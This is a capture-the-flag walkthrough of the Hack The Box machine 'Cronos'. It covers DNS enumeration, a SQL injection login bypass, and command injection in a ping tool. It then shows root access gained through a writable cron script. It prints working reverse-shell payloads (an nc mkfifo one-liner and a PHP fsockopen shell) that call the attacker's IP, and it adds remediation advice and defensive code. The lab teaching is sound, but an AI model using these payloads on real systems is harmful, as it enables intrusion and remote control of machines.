Cronos writeup
Box name: Cronos
Difficulty: Medium
OS: Linux
Overview: CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability.
Link: https://app.hackthebox.com/machines/Cronos?sort_by=created_at&sort_type=desc
Machine IP: 10.129.227.211
Ran rustscan against the machine.
rustscan -a 10.129.227.211 --ulimit 5000 -b 2000 -- -A -Pn

Navigated to the webserver and its a Default apache server.

Ran feroxbuster.
feroxbuster -u http://10.129.227.211 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,bak,zip,json,xml,py,sh,config --force-recursion -t 50 -d 4 --filter-status 404,400
Feroxbuster isn't finding anything right away. SSH is an older version and there is a CVE for that, but I'll try that last as I doubt that's the path. Nothing interesting from port 53 DNS. Rerunning rustscan and also checking UDP ports. I got stuck here and peeked at the writeup. I guess I wasn't using nslookup properly to get a useful response.
nslookup 10.129.227.211 10.129.227.211

Added that to /etc/hosts. With this new information, if we dig it we get another subdomain.
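The DNS step, as an added example that is not part of the original writeup: the reverse lookup (nslookup 10.129.227.211 10.129.227.211) names the zone, and dig axfr cronos.htb @10.129.227.211 asks the machine's own name server for a zone transfer. The script runs that dig when it is installed and otherwise parses a constructed sample of AXFR output; only cronos.htb and admin.cronos.htb come from the writeup, the other hostnames in the sample are assumed for illustration.

```python
#!/usr/bin/env python3
"""Turn a DNS zone transfer into /etc/hosts lines.

Added example, not code from the original writeup. AXFR_OUTPUT is a
constructed sample shaped like dig's answer; ns1/www entries are assumed.
"""
import re
import shutil
import subprocess

TARGET = "10.129.227.211"   # machine IP from the writeup
ZONE = "cronos.htb"         # what the reverse lookup of TARGET returns

# Constructed sample of `dig axfr cronos.htb @10.129.227.211` output.
AXFR_OUTPUT = """
; <<>> DiG 9.18.0 <<>> axfr cronos.htb @10.129.227.211
cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.\t604800\tIN\tNS\tns1.cronos.htb.
cronos.htb.\t604800\tIN\tA\t10.129.227.211
admin.cronos.htb.\t604800\tIN\tA\t10.129.227.211
ns1.cronos.htb.\t604800\tIN\tA\t10.129.227.211
www.cronos.htb.\t604800\tIN\tA\t10.129.227.211
cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 1 msec
"""

# name. TTL IN A addr  (dig prints the owner name with a trailing dot)
A_RECORD = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+A\s+(\d+\.\d+\.\d+\.\d+)$")


def parse_axfr(text):
    """Return {hostname: ip} for every A record in a dig axfr answer."""
    hosts = {}
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            hosts[m.group(1)] = m.group(2)
    return hosts


def hosts_lines(records):
    """One /etc/hosts line per IP, hostnames sorted, ready to append."""
    by_ip = {}
    for name, ip in sorted(records.items()):
        by_ip.setdefault(ip, []).append(name)
    return [f"{ip} {' '.join(names)}" for ip, names in sorted(by_ip.items())]


def run_axfr(zone, server):
    """Run the real zone transfer if dig is available; None otherwise."""
    if shutil.which("dig") is None:
        return None
    try:
        out = subprocess.run(["dig", "axfr", zone, f"@{server}"],
                             capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return out.stdout


if __name__ == "__main__":
    print(f"# reverse lookup: nslookup {TARGET} {TARGET}")
    print(f"# zone transfer:  dig axfr {ZONE} @{TARGET}")
    live = run_axfr(ZONE, TARGET)
    text = live if live and parse_axfr(live) else AXFR_OUTPUT  # fall back to the sample
    for line in hosts_lines(parse_axfr(text)):
        print(line)
```

A refused transfer prints no A records, so the fallback to the sample keeps the script useful offline; on a real engagement the printed lines are what you append to /etc/hosts.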

This brings us to a basic login. Added admin.cronos.htb to /etc/hosts and navigated to it.

I was able to log in using SQL injection.
UserName: ' or 1=1 -- -
Password: t
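Why that username works, as an added example and not code from the box: the admin panel is PHP, but the two query styles are shown here with an in-memory SQLite table and a constructed admin row. The string-built query lets the quote close the literal and the comment swallow the password check; the parameterized one treats the same bytes as data.

```python
#!/usr/bin/env python3
"""SQL injection auth bypass beside the parameterized fix (CWE-89).

Added example, not the panel's real code. The admin row and password
are constructed; hashing is plain sha256 only to keep the query shape visible.
"""
import hashlib
import sqlite3

PAYLOAD = "' or 1=1 -- -"   # the username from the writeup


def make_db():
    """In-memory users table with one constructed admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)",
               ("admin", hashlib.sha256(b"not-the-real-password").hexdigest()))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """String concatenation: the username becomes part of the SQL text."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    # With PAYLOAD this reads:  ... WHERE username = '' or 1=1 -- -' AND password = '...'
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{pw_hash}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Bound parameters: quote and comment characters are just data."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, pw_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, "t"))      # admin
    print("parameterized:", login_parameterized(db, PAYLOAD, "t"))  # None
```

The trailing `-` after `--` is there because MySQL only treats `--` as a comment when a whitespace character follows it; the extra dash keeps that space from being trimmed.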
On successful log in it brings us to some Net Tool.

It successfully pings me using the ping option and my IP address. I piped id and that also worked.

Wanted to see if there is netcat on the device by piping which nc, and that worked.

Let’s try to get a reverse shell. Set up a listener. Tried a few from revshells and I was able to get a shell.
8.8.8.8|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.27 1337 >/tmp/f
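The Net Tool bug beside a hardened handler, as an added example (the real tool is PHP; this is not its source). The vulnerable function hands the host string to a shell, which is why a pipe character runs a second command; the hardened one accepts only a parsable IP address and executes ping with an argument list and no shell. Function names are this example's own.

```python
#!/usr/bin/env python3
"""OS command injection in a ping wrapper (CWE-78) and its fix.

Added example, not the Net Tool's code. INJECTED mirrors the payload
shape from the writeup.
"""
import ipaddress
import shutil
import subprocess

INJECTED = "8.8.8.8|id"   # shell sees: ping -c 1 8.8.8.8|id


def is_valid_ip(host):
    """Allowlist check: True only for a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def ping_vulnerable(host):
    """The bug: user input spliced into a command line parsed by /bin/sh."""
    cmd = f"ping -c 1 {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_hardened(host, count=1):
    """Validate first, then exec ping directly; no shell ever parses the host."""
    if not is_valid_ip(host):
        raise ValueError(f"rejected host {host!r}: not an IP address")
    if shutil.which("ping") is None:
        raise RuntimeError("ping not installed")
    # argv list: the host reaches ping as a single argument, metacharacters included
    proc = subprocess.run(["ping", "-c", str(count), host],
                          capture_output=True, text=True, timeout=10)
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable output:\n" + ping_vulnerable(INJECTED))   # output of id, not a ping
    try:
        ping_hardened(INJECTED)
    except ValueError as exc:
        print("hardened:", exc)
```

Validation alone is not the fix; the argument list is. Even if a bad string slipped past the allowlist it would arrive in ping's argv rather than in a shell, which is the safe-API point the remediation section makes.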

Stabilized my shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl + Z
stty raw -echo; fg
# hit space
export TERM=xterm
Poked around and it looks like the main site runs Laravel and has a MySQL database.

I couldn’t find any creds. Checked /home and there is another user that we can get user.txt from.

Did more local enumeration. Eventually I saw that there was a cronjob running a script as root.

We can edit this file.

Tried changing it to a bash reverse shell, then realized the cron job runs it with PHP. Editing the file to:
<?php $sock=fsockopen("10.10.16.27",1338);exec("sh <&3 >&3 2>&3");
And we got a shell as root.
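The check a practitioner would run to find this kind of cron job, as an added example not taken from the box: parse a crontab, take every absolute path in the command part, and report files that are not root-owned or are group/world writable, plus a parent directory that would let the file be replaced. demo() builds a constructed crontab in a temporary directory (the writeup does not name the real script, so the path here is invented) and runs the audit against it.

```python
#!/usr/bin/env python3
"""Audit crontab entries for scripts a non-root user could modify.

Added example, not from the original writeup. demo() uses constructed
files and a constructed crontab so it runs without touching the system.
"""
import os
import re
import stat
import tempfile

TIME_FIELDS = 5   # minute hour day-of-month month day-of-week


def command_of(line):
    """Command part of a crontab line; None for blank, comment or VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    parts = line.split(None, 1) if line.startswith("@") else line.split(None, TIME_FIELDS)
    return parts[-1] if len(parts) >= 2 else None


def paths_in(command):
    """Absolute paths that appear as whole tokens in the command."""
    return re.findall(r"(?<!\S)(/[\w./-]+)", command)


def check_path(path, root_uid=0):
    """Findings for one path; empty list means nothing to report."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings          # absent program, not a permission problem
    if st.st_uid != root_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world writable (mode {stat.S_IMODE(st.st_mode):04o})")
    pst = os.stat(os.path.dirname(path))
    if (pst.st_mode & stat.S_IWOTH) and not (pst.st_mode & stat.S_ISVTX):
        findings.append(f"{os.path.dirname(path)}: world-writable directory, file can be replaced")
    return findings


def audit(crontab_text, root_uid=0):
    """All findings for every path referenced by the crontab text."""
    findings = []
    for line in crontab_text.splitlines():
        cmd = command_of(line)
        if cmd is not None:
            for path in paths_in(cmd):
                findings.extend(check_path(path, root_uid))
    return findings


def demo():
    """Constructed crontab with one writable and one properly locked-down script."""
    tmp = tempfile.mkdtemp()
    os.chmod(tmp, 0o755)
    bad = os.path.join(tmp, "report.php")    # invented name; the writeup does not give one
    good = os.path.join(tmp, "cleanup.sh")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("# placeholder\n")
    os.chmod(bad, 0o666)     # the writeup's condition: anyone can edit the script
    os.chmod(good, 0o755)
    crontab = f"PATH=/usr/bin\n# nightly\n* * * * *\tphp {bad}\n0 3 * * *\t{good}\n"
    # treat the current user as root so ownership is judged consistently in a sandbox
    return audit(crontab, root_uid=os.getuid())


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Against a live box, feed it `cat /etc/crontab /etc/cron.d/*` (and `crontab -l` as root when auditing your own systems) and leave root_uid at 0.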


GG
Attack Chain
1 – Reconnaissance Ran RustScan and identified ports 22 (SSH), 53 (DNS), and 80 (HTTP). Browsed to port 80 and found a default Apache page. Ran feroxbuster with no useful results. Noted an older SSH version but deprioritized it. Used nslookup against the machine’s own DNS server to resolve the hostname and discovered cronos.htb. Added it to /etc/hosts and used dig to enumerate subdomains, finding admin.cronos.htb.
rustscan -a 10.129.227.211 --ulimit 5000 -b 2000 -- -A -Pn
nslookup 10.129.227.211 10.129.227.211
feroxbuster -u http://10.129.227.211 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,bak,zip,json,xml,py,sh,config --force-recursion
2 – SQL injection authentication bypass Navigated to admin.cronos.htb and found a login page. Bypassed authentication using a classic SQL injection payload and logged in without valid credentials. The admin panel exposed a Net Tool with ping and traceroute functionality.
Username: ' or 1=1 -- -
3 – Initial Access – command injection in Net Tool Tested the ping functionality and confirmed it was passing input directly to a system command. Piped id and confirmed command injection. Confirmed netcat was present on the system. Used a mkfifo reverse shell payload to obtain an interactive shell as www-data.
8.8.8.8|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.27 1337 >/tmp/f
4 – User flag Stabilized the shell and enumerated /home. Found another user with user.txt accessible. Retrieved user.txt.
5 – Privilege Escalation – writable root crontab script Enumerated running cron jobs and identified a PHP script being executed as root on a schedule. The script file was world-writable. Replaced the contents with a PHP reverse shell payload, set up a listener, and waited for the cron job to execute. Received a root shell. Retrieved root.txt.
<?php $sock=fsockopen("10.10.16.27",1338);exec("sh <&3 >&3 2>&3");
Key Takeaways
- SQL injection authentication bypass on admin panel – CWE-89 – The admin login form passed user-supplied input directly into a SQL query without sanitization, allowing complete authentication bypass with a classic OR 1=1 payload. All database queries must use parameterized statements and admin panels must implement additional authentication controls beyond a single login form.
- DNS zone transfer revealing admin panel – The admin subdomain was only discoverable by asking the machine's own DNS server for a zone transfer (AXFR), which returned the whole zone and exposed internal hostnames. DNS servers must restrict zone transfers to authorized secondary servers only (allow-transfer in BIND), and hostnames for internal-only services should be served from an internal view rather than from the zone any client can query.
- Command injection in Net Tool – CWE-78 – The ping and traceroute functionality passed user input directly to a system command with no sanitization, allowing arbitrary OS command execution via pipe characters. All input that interacts with system commands must be validated against a strict allowlist and commands must be executed using safe API calls rather than shell execution.
- World-writable file executed by root cron job – A PHP script owned by or writable by a non-root user was scheduled to run as root via crontab. Any file executed by a privileged process must be owned by root and must not be writable by any other user. Root crontab entries must be audited regularly for world or group writable scripts.
- Admin panel exposed on a discoverable subdomain with no additional protection – The admin panel was accessible directly from the network with no IP restriction, VPN requirement, or additional authentication layer. Administrative interfaces must be restricted to authorized management networks and must never be reachable from untrusted hosts.
Remediation
[Immediate] Remediate the SQL injection vulnerability – CWE-89 Rewrite all database queries in the admin panel and any other application using parameterized queries or prepared statements. Conduct a full code audit of the Laravel application for any additional SQL injection points. Deploy a WAF with SQL injection detection rules as a compensating control during remediation.
[Immediate] Remediate the command injection vulnerability – CWE-78 Rewrite the Net Tool functionality to use safe API calls with no shell execution. Validate all user-supplied input against a strict allowlist of permitted IP address formats. If ping and traceroute functionality is not operationally required, remove it entirely from the application.
[Immediate] Fix permissions on all root crontab scripts Audit all scripts referenced in root crontab entries and set them to be owned by root with mode 755 or stricter, and make sure the directories holding them are not writable by other users either, since a writable directory lets the file be replaced even when the file itself is locked down. Remove write access for all non-root users. Implement file integrity monitoring on all cron-executed scripts to alert on unauthorized modifications.
[Immediate] Restrict DNS zone transfers Configure the DNS server to allow zone transfers only to explicitly authorized secondary DNS servers. Disable recursive queries for external clients. Audit all DNS records for internal subdomains that should not be publicly discoverable and remove or restrict any that expose internal infrastructure.
[Short-term] Restrict access to the admin panel Apply firewall rules restricting access to admin.cronos.htb to specific authorized management IP addresses. Require VPN access for all administrative interfaces. Implement MFA on the admin login page and enforce account lockout after failed authentication attempts.
[Long-term] Implement a secure development lifecycle for web applications SQL injection and command injection are well-understood vulnerability classes that must be caught before deployment. Integrate SAST tooling into the CI/CD pipeline, conduct regular web application penetration tests, and train developers on secure coding practices covering parameterized queries, input validation, and safe system command execution.